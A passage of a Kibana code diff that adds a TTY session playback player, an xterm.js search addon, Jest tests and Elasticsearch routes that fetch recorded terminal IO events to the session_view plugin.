+ return; + } + + if (currentLine < lines.length) { + setCurrentLine(currentLine + 1); + } + }, playSpeed); + + return () => { + clearInterval(timer); + }; + } + }, [lines, currentLine, isPlaying, playSpeed]); + + useEffect(() => { + render(currentLine); + + if (hasNextPage && fetchNextPage && currentLine === lines.length - 1) { + fetchNextPage(); + } + }, [fetchNextPage, currentLine, lines, render, hasNextPage]); + + const seekToLine = useCallback((line) => { + setUserSeeked(true); + setCurrentLine(line); + }, []); + + const search = useCallback( + (query: string, startCol: number) => { + searchAddon.findNext(query, { caseSensitive: false, lastLineOnly: true, startCol }); + }, + [searchAddon] + ); + + const fit = useCallback(() => { + fitAddon.fit(); + }, [fitAddon]); + + return { + terminal, + currentLine, + seekToLine, + search, + fit, + }; +}; diff --git a/x-pack/plugins/session_view/public/components/tty_player/index.test.tsx b/x-pack/plugins/session_view/public/components/tty_player/index.test.tsx new file mode 100644 index 0000000000000..d9fa7baf6e886 --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_player/index.test.tsx @@ -0,0 +1,81 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import React from 'react'; +import { waitFor } from '@testing-library/react'; +import { sessionViewIOEventsMock } from '../../../common/mocks/responses/session_view_io_events.mock'; +import { AppContextTestRender, createAppRootMockRenderer } from '../../test'; +import { TTYPlayerDeps, TTYPlayer } from '.'; + +describe('TTYPlayer component', () => { + beforeAll(() => { + // https://stackoverflow.com/questions/39830580/jest-test-fails-typeerror-window-matchmedia-is-not-a-function + // xtermjs is using window.matchMedia, which isn't mocked in jest by default. + Object.defineProperty(window, 'matchMedia', { + writable: true, + value: jest.fn().mockImplementation((query) => ({ + matches: false, + media: query, + onchange: null, + addListener: jest.fn(), // Deprecated + removeListener: jest.fn(), // Deprecated + addEventListener: jest.fn(), + removeEventListener: jest.fn(), + dispatchEvent: jest.fn(), + })), + }); + }); + + let render: () => ReturnType; + let renderResult: ReturnType; + let mockedContext: AppContextTestRender; + let mockedApi: AppContextTestRender['coreStart']['http']['get']; + let props: TTYPlayerDeps; + + const waitForApiCall = () => waitFor(() => expect(mockedApi).toHaveBeenCalled()); + + beforeEach(() => { + mockedContext = createAppRootMockRenderer(); + mockedApi = mockedContext.coreStart.http.get; + mockedApi.mockResolvedValue(sessionViewIOEventsMock); + + const mockSessionEntityId = + sessionViewIOEventsMock?.events?.[0]?._source?.process?.entry_leader?.entity_id; + + props = { + sessionEntityId: mockSessionEntityId, + onClose: jest.fn(), + isFullscreen: false, + }; + }); + + describe('When TTYPlayer is mounted', () => { + it('should have a search bar', () => { + renderResult = mockedContext.render(); + expect(renderResult.queryByTestId('sessionView:TTYSearch')).toBeTruthy(); + }); + it('should render container for xtermjs', () => { + renderResult = mockedContext.render(); + expect(renderResult.queryByTestId('sessionView:TTYPlayer')).toBeTruthy(); + }); + it('should have player controls', () => { + renderResult = mockedContext.render(); + expect(renderResult.queryByTestId('sessionView:TTYPlayerControls')).toBeTruthy(); + }); + it('should have rendered an instance of xtermjs', () => { + renderResult = mockedContext.render(); + expect( + renderResult.queryByTestId('sessionView:TTYPlayer')?.querySelector('.terminal.xterm') + ).toBeTruthy(); + }); + it('should have fetched io events', async () => { + renderResult = mockedContext.render(); + + await waitForApiCall(); + }); + }); +}); diff --git a/x-pack/plugins/session_view/public/components/tty_player/index.tsx b/x-pack/plugins/session_view/public/components/tty_player/index.tsx new file mode 100644 index 0000000000000..48dbf82441e42 --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_player/index.tsx @@ -0,0 +1,100 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import React, { useRef, useState, useCallback, ChangeEvent, MouseEvent } from 'react'; +import { EuiPanel, EuiRange, EuiFlexGroup, EuiFlexItem, EuiButtonIcon } from '@elastic/eui'; +import { TTYSearchBar } from '../tty_search_bar'; +import { useStyles } from './styles'; +import { useFetchIOEvents, useIOLines, useXtermPlayer } from './hooks'; + +export interface TTYPlayerDeps { + sessionEntityId: string; // TODO: we should not load by session id, but instead a combo of process.tty.major+minor, session time range, and host.boot_id (see Rabbitholes section of epic). + onClose(): void; + isFullscreen: boolean; +} + +export const TTYPlayer = ({ sessionEntityId, onClose, isFullscreen }: TTYPlayerDeps) => { + const styles = useStyles(); + const ref = useRef(null); + + const { data, fetchNextPage, hasNextPage } = useFetchIOEvents(sessionEntityId); + const lines = useIOLines(data?.pages); + const [isPlaying, setIsPlaying] = useState(false); + const { search, currentLine, seekToLine } = useXtermPlayer({ + ref, + isPlaying, + lines, + hasNextPage, + fetchNextPage, + isFullscreen, + }); + + const onLineChange = useCallback( + (event: ChangeEvent | MouseEvent) => { + const line = parseInt((event?.target as HTMLInputElement).value || '0', 10); + seekToLine(line); + setIsPlaying(false); + }, + [seekToLine] + ); + + const onTogglePlayback = useCallback(() => { + setIsPlaying(!isPlaying); + }, [isPlaying]); + + return ( +
+ + + + + + + + + + + +
+ + {/* the following will be replaced by a new component */} + + + + + + + + + + +
+ ); +}; diff --git a/x-pack/plugins/session_view/public/components/tty_player/styles.ts b/x-pack/plugins/session_view/public/components/tty_player/styles.ts new file mode 100644 index 0000000000000..c4061c8a64dce --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_player/styles.ts @@ -0,0 +1,55 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { useMemo } from 'react'; +import { CSSObject, css } from '@emotion/react'; +import { transparentize, useEuiScrollBar } from '@elastic/eui'; +import { useEuiTheme } from '../../hooks'; + +export const useStyles = () => { + const { euiTheme } = useEuiTheme(); + const euiScrollBar = useEuiScrollBar(); + + const cached = useMemo(() => { + const { size, colors, border } = euiTheme; + + const container: CSSObject = { + position: 'absolute', + top: 0, + width: '100%', + height: '100%', + overflow: 'hidden', + borderRadius: size.s, + backgroundColor: colors.ink, + '.euiRangeLevel--warning': { + backgroundColor: transparentize(colors.warning, 0.8), + }, + '.euiRangeLevel--danger': { + backgroundColor: transparentize(colors.danger, 0.8), + }, + '.euiRangeTick,.euiRangeLevel': { + transition: 'left 500ms', + }, + }; + + const terminal: CSSObject = { + width: '100%', + height: 'calc(100% - 142px)', + '.xterm-viewport': css` + ${euiScrollBar} + `, + border: border.thin, + }; + + return { + container, + terminal, + }; + }, [euiScrollBar, euiTheme]); + + return cached; +}; diff --git a/x-pack/plugins/session_view/public/components/tty_player/xterm_search.ts b/x-pack/plugins/session_view/public/components/tty_player/xterm_search.ts new file mode 100644 index 0000000000000..258920319676c --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_player/xterm_search.ts @@ -0,0 +1,487 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +/** + * Copyright (c) 2017 The xterm.js authors. All rights reserved. + * @license MIT + */ +import { Terminal, IDisposable, ITerminalAddon, ISelectionPosition } from 'xterm'; + +export interface ISearchOptions { + regex?: boolean; + wholeWord?: boolean; + caseSensitive?: boolean; + incremental?: boolean; + lastLineOnly?: boolean; + startCol?: number; +} + +export interface ISearchPosition { + startCol: number; + startRow: number; +} + +export interface ISearchResult { + term: string; + col: number; + row: number; + size: number; +} + +type LineCacheEntry = [ + /** + * The string representation of a line (as opposed to the buffer cell representation). + */ + lineAsString: string, + /** + * The offsets where each line starts when the entry describes a wrapped line. + */ + lineOffsets: number[] +]; + +const LINES_CACHE_TIME_TO_LIVE = 15 * 1000; // 15 secs + +export class SearchAddon implements ITerminalAddon { + private _terminal: Terminal | undefined; + + /** + * translateBufferLineToStringWithWrap is a fairly expensive call. + * We memoize the calls into an array that has a time based ttl. + * _linesCache is also invalidated when the terminal cursor moves. + */ + private _linesCache: LineCacheEntry[] | undefined; + private _linesCacheTimeoutId = 0; + private _cursorMoveListener: IDisposable | undefined; + private _resizeListener: IDisposable | undefined; + + public activate(terminal: Terminal): void { + this._terminal = terminal; + } + + public dispose(): void {} + + /** + * Find the next instance of the term, then scroll to and select it. If it + * doesn't exist, do nothing. + * @param term The search term. + * @param searchOptions Search options. + * @return Whether a result was found. + */ + public findNext(term: string, searchOptions?: ISearchOptions): boolean { + if (!this._terminal) { + throw new Error('Cannot use addon until it has been loaded'); + } + + if (!term || term.length === 0) { + this._terminal.clearSelection(); + return false; + } + + let startCol = 0; + let startRow = 0; + let currentSelection: ISelectionPosition | undefined; + if (this._terminal.hasSelection()) { + const incremental = searchOptions ? searchOptions.incremental : false; + // Start from the selection end if there is a selection + // For incremental search, use existing row + currentSelection = this._terminal.getSelectionPosition()!; + startRow = incremental ? currentSelection.startRow : currentSelection.endRow; + startCol = incremental ? currentSelection.startColumn : currentSelection.endColumn; + } + + if (searchOptions?.lastLineOnly) { + startRow = this._terminal.buffer.active.cursorY - 1; + startCol = searchOptions?.startCol || 0; + } + + this._initLinesCache(); + + const searchPosition: ISearchPosition = { + startRow, + startCol, + }; + + // Search startRow + let result = this._findInLine(term, searchPosition, searchOptions); + + // Search from startRow + 1 to end + if (!result) { + for ( + let y = startRow + 1; + y < this._terminal.buffer.active.baseY + this._terminal.rows; + y++ + ) { + searchPosition.startRow = y; + searchPosition.startCol = 0; + // If the current line is wrapped line, increase index of column to ignore the previous scan + // Otherwise, reset beginning column index to zero with set new unwrapped line index + result = this._findInLine(term, searchPosition, searchOptions); + if (result) { + break; + } + } + } + // If we hit the bottom and didn't search from the very top wrap back up + if (!result && startRow !== 0) { + for (let y = 0; y < startRow; y++) { + searchPosition.startRow = y; + searchPosition.startCol = 0; + result = this._findInLine(term, searchPosition, searchOptions); + if (result) { + break; + } + } + } + + // If there is only one result, wrap back and return selection if it exists. + if (!result && currentSelection) { + searchPosition.startRow = currentSelection.startRow; + searchPosition.startCol = 0; + result = this._findInLine(term, searchPosition, searchOptions); + } + + // Set selection and scroll if a result was found + return this._selectResult(result); + } + + /** + * Find the previous instance of the term, then scroll to and select it. If it + * doesn't exist, do nothing. + * @param term The search term. + * @param searchOptions Search options. + * @return Whether a result was found. + */ + public findPrevious(term: string, searchOptions?: ISearchOptions): boolean { + if (!this._terminal) { + throw new Error('Cannot use addon until it has been loaded'); + } + + if (!term || term.length === 0) { + this._terminal.clearSelection(); + return false; + } + + const isReverseSearch = true; + let startRow = this._terminal.buffer.active.baseY + this._terminal.rows; + let startCol = this._terminal.cols; + let result: ISearchResult | undefined; + const incremental = searchOptions ? searchOptions.incremental : false; + let currentSelection: ISelectionPosition | undefined; + if (this._terminal.hasSelection()) { + currentSelection = this._terminal.getSelectionPosition()!; + // Start from selection start if there is a selection + startRow = currentSelection.startRow; + startCol = currentSelection.startColumn; + } + + if (searchOptions?.lastLineOnly) { + startRow = this._terminal.buffer.active.cursorY - 1; + } + + this._initLinesCache(); + const searchPosition: ISearchPosition = { + startRow, + startCol, + }; + + if (incremental) { + // Try to expand selection to right first. + result = this._findInLine(term, searchPosition, searchOptions, false); + const isOldResultHighlighted = result && result.row === startRow && result.col === startCol; + if (!isOldResultHighlighted) { + // If selection was not able to be expanded to the right, then try reverse search + if (currentSelection) { + searchPosition.startRow = currentSelection.endRow; + searchPosition.startCol = currentSelection.endColumn; + } + result = this._findInLine(term, searchPosition, searchOptions, true); + } + } else { + result = this._findInLine(term, searchPosition, searchOptions, isReverseSearch); + } + + // Search from startRow - 1 to top + if (!result) { + searchPosition.startCol = Math.max(searchPosition.startCol, this._terminal.cols); + for (let y = startRow - 1; y >= 0; y--) { + searchPosition.startRow = y; + result = this._findInLine(term, searchPosition, searchOptions, isReverseSearch); + if (result) { + break; + } + } + } + // If we hit the top and didn't search from the very bottom wrap back down + if (!result && startRow !== this._terminal.buffer.active.baseY + this._terminal.rows) { + for (let y = this._terminal.buffer.active.baseY + this._terminal.rows; y >= startRow; y--) { + searchPosition.startRow = y; + result = this._findInLine(term, searchPosition, searchOptions, isReverseSearch); + if (result) { + break; + } + } + } + + // If there is only one result, return true. + if (!result && currentSelection) return true; + + // Set selection and scroll if a result was found + return this._selectResult(result); + } + + /** + * Sets up a line cache with a ttl + */ + private _initLinesCache(): void { + const terminal = this._terminal!; + if (!this._linesCache) { + this._linesCache = new Array(terminal.buffer.active.length); + this._cursorMoveListener = terminal.onCursorMove(() => this._destroyLinesCache()); + this._resizeListener = terminal.onResize(() => this._destroyLinesCache()); + } + + window.clearTimeout(this._linesCacheTimeoutId); + this._linesCacheTimeoutId = window.setTimeout( + () => this._destroyLinesCache(), + LINES_CACHE_TIME_TO_LIVE + ); + } + + private _destroyLinesCache(): void { + this._linesCache = undefined; + if (this._cursorMoveListener) { + this._cursorMoveListener.dispose(); + this._cursorMoveListener = undefined; + } + if (this._resizeListener) { + this._resizeListener.dispose(); + this._resizeListener = undefined; + } + if (this._linesCacheTimeoutId) { + window.clearTimeout(this._linesCacheTimeoutId); + this._linesCacheTimeoutId = 0; + } + } + + /** + * Searches a line for a search term. Takes the provided terminal line and searches the text line, which may contain + * subsequent terminal lines if the text is wrapped. If the provided line number is part of a wrapped text line that + * started on an earlier line then it is skipped since it will be properly searched when the terminal line that the + * text starts on is searched. + * @param term The search term. + * @param searchPosition The position to start the search. + * @param searchOptions Search options. + * @param isReverseSearch Whether the search should start from the right side of the terminal and search to the left. + * @return The search result if it was found. + */ + protected _findInLine( + term: string, + searchPosition: ISearchPosition, + searchOptions: ISearchOptions = {}, + isReverseSearch: boolean = false + ): ISearchResult | undefined { + const terminal = this._terminal!; + const row = searchPosition.startRow; + const col = searchPosition.startCol; + + // Ignore wrapped lines, only consider on unwrapped line (first row of command string). + const firstLine = terminal.buffer.active.getLine(row); + if (firstLine?.isWrapped) { + if (isReverseSearch) { + searchPosition.startCol += terminal.cols; + return; + } + + // This will iterate until we find the line start. + // When we find it, we will search using the calculated start column. + searchPosition.startRow--; + searchPosition.startCol += terminal.cols; + return this._findInLine(term, searchPosition, searchOptions); + } + let cache = this._linesCache?.[row]; + if (!cache) { + cache = this._translateBufferLineToStringWithWrap(row, true); + if (this._linesCache) { + this._linesCache[row] = cache; + } + } + const [stringLine, offsets] = cache; + + const offset = this._bufferColsToStringOffset(row, col); + const searchTerm = searchOptions.caseSensitive ? term : term.toLowerCase(); + const searchStringLine = searchOptions.caseSensitive ? stringLine : stringLine.toLowerCase(); + + let resultIndex = -1; + if (searchOptions.regex) { + const searchRegex = RegExp(searchTerm, 'g'); + let foundTerm: RegExpExecArray | null; + if (isReverseSearch) { + // This loop will get the resultIndex of the _last_ regex match in the range 0..offset + while ((foundTerm = searchRegex.exec(searchStringLine.slice(0, offset)))) { + resultIndex = searchRegex.lastIndex - foundTerm[0].length; + term = foundTerm[0]; + searchRegex.lastIndex -= term.length - 1; + } + } else { + foundTerm = searchRegex.exec(searchStringLine.slice(offset)); + if (foundTerm && foundTerm[0].length > 0) { + resultIndex = offset + (searchRegex.lastIndex - foundTerm[0].length); + term = foundTerm[0]; + } + } + } else { + if (isReverseSearch) { + if (offset - searchTerm.length >= 0) { + resultIndex = searchStringLine.lastIndexOf(searchTerm, offset - searchTerm.length); + } + } else { + resultIndex = searchStringLine.indexOf(searchTerm, offset); + } + } + + if (resultIndex >= 0) { + // Adjust the row number and search index if needed since a "line" of text can span multiple rows + let startRowOffset = 0; + while (startRowOffset < offsets.length - 1 && resultIndex >= offsets[startRowOffset + 1]) { + startRowOffset++; + } + let endRowOffset = startRowOffset; + while ( + endRowOffset < offsets.length - 1 && + resultIndex + term.length >= offsets[endRowOffset + 1] + ) { + endRowOffset++; + } + const startColOffset = resultIndex - offsets[startRowOffset]; + const endColOffset = resultIndex + term.length - offsets[endRowOffset]; + const startColIndex = this._stringLengthToBufferSize(row + startRowOffset, startColOffset); + const endColIndex = this._stringLengthToBufferSize(row + endRowOffset, endColOffset); + const size = endColIndex - startColIndex + terminal.cols * (endRowOffset - startRowOffset); + + return { + term, + col: startColIndex, + row: row + startRowOffset, + size, + }; + } + } + + private _stringLengthToBufferSize(row: number, offset: number): number { + const line = this._terminal!.buffer.active.getLine(row); + if (!line) { + return 0; + } + for (let i = 0; i < offset; i++) { + const cell = line.getCell(i); + if (!cell) { + break; + } + // Adjust the searchIndex to normalize emoji into single chars + const char = cell.getChars(); + if (char.length > 1) { + offset -= char.length - 1; + } + // Adjust the searchIndex for empty characters following wide unicode + // chars (eg. CJK) + const nextCell = line.getCell(i + 1); + if (nextCell && nextCell.getWidth() === 0) { + offset++; + } + } + return offset; + } + + private _bufferColsToStringOffset(startRow: number, cols: number): number { + const terminal = this._terminal!; + let lineIndex = startRow; + let offset = 0; + let line = terminal.buffer.active.getLine(lineIndex); + while (cols > 0 && line) { + for (let i = 0; i < cols && i < terminal.cols; i++) { + const cell = line.getCell(i); + if (!cell) { + break; + } + if (cell.getWidth()) { + offset += cell.getChars().length; + } + } + lineIndex++; + line = terminal.buffer.active.getLine(lineIndex); + if (line && !line.isWrapped) { + break; + } + cols -= terminal.cols; + } + return offset; + } + + /** + * Translates a buffer line to a string, including subsequent lines if they are wraps. + * Wide characters will count as two columns in the resulting string. This + * function is useful for getting the actual text underneath the raw selection + * position. + * @param lineIndex The line being translated. + * @param trimRight Whether to trim whitespace to the right. + */ + private _translateBufferLineToStringWithWrap( + lineIndex: number, + trimRight: boolean + ): LineCacheEntry { + const terminal = this._terminal!; + const strings = []; + const lineOffsets = [0]; + let line = terminal.buffer.active.getLine(lineIndex); + while (line) { + const nextLine = terminal.buffer.active.getLine(lineIndex + 1); + const lineWrapsToNext = nextLine ? nextLine.isWrapped : false; + let string = line.translateToString(!lineWrapsToNext && trimRight); + if (lineWrapsToNext && nextLine) { + const lastCell = line.getCell(line.length - 1); + const lastCellIsNull = lastCell && lastCell.getCode() === 0 && lastCell.getWidth() === 1; + // a wide character wrapped to the next line + if (lastCellIsNull && nextLine.getCell(0)?.getWidth() === 2) { + string = string.slice(0, -1); + } + } + strings.push(string); + if (lineWrapsToNext) { + lineOffsets.push(lineOffsets[lineOffsets.length - 1] + string.length); + } else { + break; + } + lineIndex++; + line = nextLine; + } + return [strings.join(''), lineOffsets]; + } + + /** + * Selects and scrolls to a result. + * @param result The result to select. + * @return Whethera result was selected. + */ + private _selectResult(result: ISearchResult | undefined): boolean { + const terminal = this._terminal!; + if (!result) { + terminal.clearSelection(); + return false; + } + terminal.select(result.col, result.row, result.size); + // If it is not in the viewport then we scroll else it just gets selected + if ( + result.row >= terminal.buffer.active.viewportY + terminal.rows || + result.row < terminal.buffer.active.viewportY + ) { + let scroll = result.row - terminal.buffer.active.viewportY; + scroll -= Math.floor(terminal.rows / 2); + terminal.scrollLines(scroll); + } + return true; + } +} diff --git a/x-pack/plugins/session_view/public/components/tty_search_bar/index.test.tsx b/x-pack/plugins/session_view/public/components/tty_search_bar/index.test.tsx new file mode 100644 index 0000000000000..4545acf1a4578 --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_search_bar/index.test.tsx @@ -0,0 +1,102 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import React from 'react'; +import { renderHook } from '@testing-library/react-hooks'; +import userEvent from '@testing-library/user-event'; +import { fireEvent } from '@testing-library/dom'; +import { AppContextTestRender, createAppRootMockRenderer } from '../../test'; +import { sessionViewIOEventsMock } from '../../../common/mocks/responses/session_view_io_events.mock'; +import { useIOLines } from '../tty_player/hooks'; +import { ProcessEventsPage } from '../../../common/types/process_tree'; +import { TTYSearchBar, TTYSearchBarDeps } from '.'; + +// TTYSearchBar is a HOC to SessionViewSearchBar which is already well tested +// so these tests will only focus on newly added functionality +describe('TTYSearchBar component', () => { + let render: () => ReturnType; + let renderResult: ReturnType; + let mockedContext: AppContextTestRender; + let props: TTYSearchBarDeps; + + beforeEach(() => { + mockedContext = createAppRootMockRenderer(); + + const events = sessionViewIOEventsMock?.events?.map((event) => event._source); + const pages: ProcessEventsPage[] = [{ events, total: events?.length }]; + const { result } = renderHook(() => useIOLines(pages)); + const lines = result.current; + + props = { + lines, + seekToLine: jest.fn(), + xTermSearchFn: jest.fn(), + }; + }); + + it('mounts and renders the search bar', async () => { + renderResult = mockedContext.render(); + expect(renderResult.queryByTestId('sessionView:searchBar')).toBeTruthy(); + }); + + it('does a search when a user enters text and hits enter', async () => { + renderResult = mockedContext.render(); + + const searchInput = renderResult.queryByTestId('sessionView:searchBar')?.querySelector('input'); + if (searchInput) { + userEvent.type(searchInput, '-h'); + fireEvent.keyUp(searchInput, { key: 'Enter', code: 'Enter' }); + } + + expect(props.seekToLine).toHaveBeenCalledTimes(1); + + // there is a slight delay in the seek in xtermjs, so we wait 100ms before trying to highlight a result. + await new Promise((r) => setTimeout(r, 100)); + + expect(props.xTermSearchFn).toHaveBeenCalledTimes(1); + }); + + it('calls seekToline and xTermSearchFn when currentMatch changes', async () => { + renderResult = mockedContext.render(); + + const searchInput = renderResult.queryByTestId('sessionView:searchBar')?.querySelector('input'); + if (searchInput) { + userEvent.type(searchInput, '-h'); + fireEvent.keyUp(searchInput, { key: 'Enter', code: 'Enter' }); + } + + await new Promise((r) => setTimeout(r, 100)); + + userEvent.click(renderResult.getByTestId('pagination-button-next')); + + await new Promise((r) => setTimeout(r, 100)); + + // two calls, first instance -h is at line 22, 2nd at line 42 + expect(props.seekToLine).toHaveBeenCalledTimes(2); + expect(props.seekToLine).toHaveBeenNthCalledWith(1, 22); + expect(props.seekToLine).toHaveBeenNthCalledWith(2, 42); + + expect(props.xTermSearchFn).toHaveBeenCalledTimes(2); + expect(props.xTermSearchFn).toHaveBeenNthCalledWith(1, '-h', 6); + expect(props.xTermSearchFn).toHaveBeenNthCalledWith(2, '-h', 13); + }); + + it('calls xTermSearchFn with empty query when search is cleared', async () => { + renderResult = mockedContext.render(); + + const searchInput = renderResult.queryByTestId('sessionView:searchBar')?.querySelector('input'); + if (searchInput) { + userEvent.type(searchInput, '-h'); + fireEvent.keyUp(searchInput, { key: 'Enter', code: 'Enter' }); + } + + await new Promise((r) => setTimeout(r, 100)); + userEvent.click(renderResult.getByTestId('clearSearchButton')); + await new Promise((r) => setTimeout(r, 100)); + + expect(props.xTermSearchFn).toHaveBeenNthCalledWith(2, '', 0); + }); +}); diff --git a/x-pack/plugins/session_view/public/components/tty_search_bar/index.tsx b/x-pack/plugins/session_view/public/components/tty_search_bar/index.tsx new file mode 100644 index 0000000000000..af60bdf664f9d --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_search_bar/index.tsx @@ -0,0 +1,97 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import React, { useEffect, useMemo, useState, useCallback } from 'react'; +import { SessionViewSearchBar } from '../session_view_search_bar'; +import { IOLine } from '../../../common/types/process_tree'; + +interface SearchResult { + line: IOLine; + match: string; + index: number; +} + +export interface TTYSearchBarDeps { + lines: IOLine[]; + seekToLine(index: number): void; + xTermSearchFn(query: string, index: number): void; +} + +export const TTYSearchBar = ({ lines, seekToLine, xTermSearchFn }: TTYSearchBarDeps) => { + const [currentMatch, setCurrentMatch] = useState(null); + const [searchQuery, setSearchQuery] = useState(''); + + useEffect(() => { + if (currentMatch) { + const goToLine = lines.indexOf(currentMatch.line); + seekToLine(goToLine); + } + + const timeout = setTimeout(() => { + return xTermSearchFn(searchQuery, currentMatch?.index || 0); + }, 100); + + return () => { + clearTimeout(timeout); + }; + }, [currentMatch, searchQuery, lines, xTermSearchFn, seekToLine]); + + const searchResults = useMemo(() => { + if (searchQuery) { + const matches: SearchResult[] = []; + + lines.reduce((previous: SearchResult[], current: IOLine) => { + if (current.value) { + const regex = new RegExp(searchQuery.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'), 'ig'); + const lineMatches = current.value.matchAll(regex); + if (lineMatches) { + for (const match of lineMatches) { + previous.push({ line: current, match: match[0], index: match.index || 0 }); + } + } + } + + return previous; + }, matches); + + if (matches.length > 0) { + setCurrentMatch(matches[0]); + } else { + setCurrentMatch(null); + } + + return matches; + } + + return []; + }, [searchQuery, lines]); + + const onSearch = useCallback((query) => { + setSearchQuery(query); + setCurrentMatch(null); + }, []); + + const onSetCurrentMatch = useCallback( + (index) => { + const match = searchResults[index]; + + if (match && currentMatch !== match) { + setCurrentMatch(match); + } + }, + [currentMatch, searchResults] + ); + + return ( + + ); +}; diff --git a/x-pack/plugins/session_view/public/types.ts b/x-pack/plugins/session_view/public/types.ts index f8a42c0c4660c..d276f0e9518a9 100644 --- a/x-pack/plugins/session_view/public/types.ts +++ b/x-pack/plugins/session_view/public/types.ts @@ -107,15 +107,15 @@ export interface DetailPanelOrchestrator { name: string; type: string; ip: string; + parent: { + type: string; + }; }; namespace: string; cluster: { name: string; id: string; }; - parent: { - type: string; - }; } export interface DetailPanelCloud { diff --git a/x-pack/plugins/session_view/server/routes/get_total_io_bytes_route.ts b/x-pack/plugins/session_view/server/routes/get_total_io_bytes_route.ts new file mode 100644 index 0000000000000..c7371e05d058c --- /dev/null +++ b/x-pack/plugins/session_view/server/routes/get_total_io_bytes_route.ts @@ -0,0 +1,65 @@ +/* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import { schema } from '@kbn/config-schema'; +import { IRouter } from '@kbn/core/server'; +import { EVENT_ACTION } from '@kbn/rule-data-utils'; +import { + GET_TOTAL_IO_BYTES_ROUTE, + PROCESS_EVENTS_INDEX, + ENTRY_SESSION_ENTITY_ID_PROPERTY, + TOTAL_BYTES_CAPTURED_PROPERTY, +} from '../../common/constants'; + +export const registerGetTotalIOBytesRoute = (router: IRouter) => { + router.get( + { + path: GET_TOTAL_IO_BYTES_ROUTE, + validate: { + query: schema.object({ + sessionEntityId: schema.string(), + }), + }, + }, + async (context, request, response) => { + const client = (await context.core).elasticsearch.client.asCurrentUser; + const { sessionEntityId } = request.query; + + try { + const search = await client.search({ + index: [PROCESS_EVENTS_INDEX], + body: { + query: { + bool: { + must: [ + { term: { [ENTRY_SESSION_ENTITY_ID_PROPERTY]: sessionEntityId } }, + { term: { [EVENT_ACTION]: 'text_output' } }, + ], + }, + }, + size: 0, + aggs: { + total_bytes_captured: { + sum: { + field: TOTAL_BYTES_CAPTURED_PROPERTY, + }, + }, + }, + }, + }); + + const agg: any = search.aggregations?.total_bytes_captured; + + return response.ok({ body: agg?.value || 0 }); + } catch (err) { + // unauthorized + if (err.meta.statusCode === 403) { + return response.ok(); + } + + return response.badRequest(err.message); + } + } + ); +}; diff --git a/x-pack/plugins/session_view/server/routes/index.ts b/x-pack/plugins/session_view/server/routes/index.ts index 2955ccdd39327..0e4099fe01cfa 100644 --- a/x-pack/plugins/session_view/server/routes/index.ts +++ b/x-pack/plugins/session_view/server/routes/index.ts @@ -9,9 +9,13 @@ import { RuleRegistryPluginStartContract } from '@kbn/rule-registry-plugin/serve import { registerProcessEventsRoute } from './process_events_route'; import { registerAlertsRoute } from './alerts_route'; import { registerAlertStatusRoute } from './alert_status_route'; +import { registerIOEventsRoute } from './io_events_route'; +import { registerGetTotalIOBytesRoute } from './get_total_io_bytes_route'; export const registerRoutes = (router: IRouter, ruleRegistry: RuleRegistryPluginStartContract) => { registerProcessEventsRoute(router, ruleRegistry); registerAlertsRoute(router, ruleRegistry); registerAlertStatusRoute(router, ruleRegistry); + registerIOEventsRoute(router); + registerGetTotalIOBytesRoute(router); }; diff --git a/x-pack/plugins/session_view/server/routes/io_events_route.ts b/x-pack/plugins/session_view/server/routes/io_events_route.ts new file mode 100644 index 0000000000000..c03035a8b36a7 --- /dev/null +++ b/x-pack/plugins/session_view/server/routes/io_events_route.ts @@ -0,0 +1,66 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import { schema } from '@kbn/config-schema'; +import { IRouter } from '@kbn/core/server'; +import { EVENT_ACTION } from '@kbn/rule-data-utils'; +import { + IO_EVENTS_ROUTE, + IO_EVENTS_PER_PAGE, + PROCESS_EVENTS_INDEX, + ENTRY_SESSION_ENTITY_ID_PROPERTY, +} from '../../common/constants'; + +export const registerIOEventsRoute = (router: IRouter) => { + router.get( + { + path: IO_EVENTS_ROUTE, + validate: { + query: schema.object({ + sessionEntityId: schema.string(), + cursor: schema.maybe(schema.string()), + }), + }, + }, + async (context, request, response) => { + const client = (await context.core).elasticsearch.client.asCurrentUser; + const { cursor } = request.query; + const { sessionEntityId } = request.query; + + try { + const search = await client.search({ + index: [PROCESS_EVENTS_INDEX], + body: { + query: { + bool: { + must: [ + { term: { [ENTRY_SESSION_ENTITY_ID_PROPERTY]: sessionEntityId } }, + { term: { [EVENT_ACTION]: 'text_output' } }, + ], + }, + }, + size: IO_EVENTS_PER_PAGE, + sort: [{ '@timestamp': 'asc' }], + search_after: cursor ? [cursor] : undefined, + }, + }); + + const events = search.hits.hits; + const total = + typeof search.hits.total === 'number' ? search.hits.total : search.hits.total?.value; + + return response.ok({ body: { total, events } }); + } catch (err) { + // unauthorized + if (err.meta.statusCode === 403) { + return response.ok({ 